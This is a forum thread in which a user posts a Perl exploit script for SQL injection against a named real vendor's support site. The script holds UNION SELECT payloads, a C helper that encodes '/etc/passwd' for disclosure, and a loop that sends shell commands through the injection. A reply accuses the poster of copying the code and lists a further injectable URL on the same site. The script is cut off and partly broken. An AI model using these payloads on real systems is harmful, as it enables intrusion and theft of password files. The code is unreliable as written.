Jump to content
fl0 fl0w

Jgaa's Internet <= MSQL injection file disclosure

Recommended Posts

#!/usr/bin/perl

#You can get admin hash,or acces the pass file from the *NIx

#with the generated strings with the generator.c program

#you have to put in sql specific comands,my example is for

#tables and *NIX pass

#exploit tested on winxp sp2

# #include<stdio.h>

# #include<stdlib.h>

# #include<string.h>

# int main()

# { char st[1024];

# int le;

# printf("Input : ");

# gets(st);

# for(le=0;le<strlen(st);le++)

# { printf("%d,",st[le]);

# }

# system("pause");

# return 0;

# }

#101,116,99,47,112,97,115,115,119,100 = /etc/passwd

#If we would do this :

#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*

#we create 8 tables ,to see the result type :

#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*

print "......Start.......\n";

print ".................\n";

print ". fl0 fl0w .\n";

print ". found by fl0w fl0w\n";

print ". c0ded by fl0 fl0w\n";

print ".......Email me at flo[underscore]flow[underscore]supremacy[dot]com\n\n";

print ".................\n\n";

use LWP::UserAgent;

$site=@ARGV[0];

$shells=@ARGV[1];

$shellcmd=@ARGV[2];

if($site!~/http:\/\// || $site!~/http:\/\// || !$shells)

{ routine()

}

header();

while() { print"[shell] \$";

while(<STDIN>)

{ $cmd=$_;

chomp($cmd);

$sploit=LWP::UserAgent->new() or die;

$requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";

$re=$sploit->request(requesting);

$i=$re->content;

$i=~tr/[\n]/[

Link to comment
Share on other sites

Doamne .. stii ce-ai scris p`acolo? Intelegi ce-ai facut? explica-mi si mie ce face sql injection ala ca-s curios .pe langa ca pagina ii plina de sql injection: http://support.jgaa.com/index.php?cmd=ShowProduct&ID=513'

si de unde ai copiat codu la exploit:http://www.vivelinux.org/exploits/2260

macar nu-l pune ca tu l-ai scris

si is 9 tabele nu 8 cum ai zis tu.. ai uitat sa numeri si 0

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...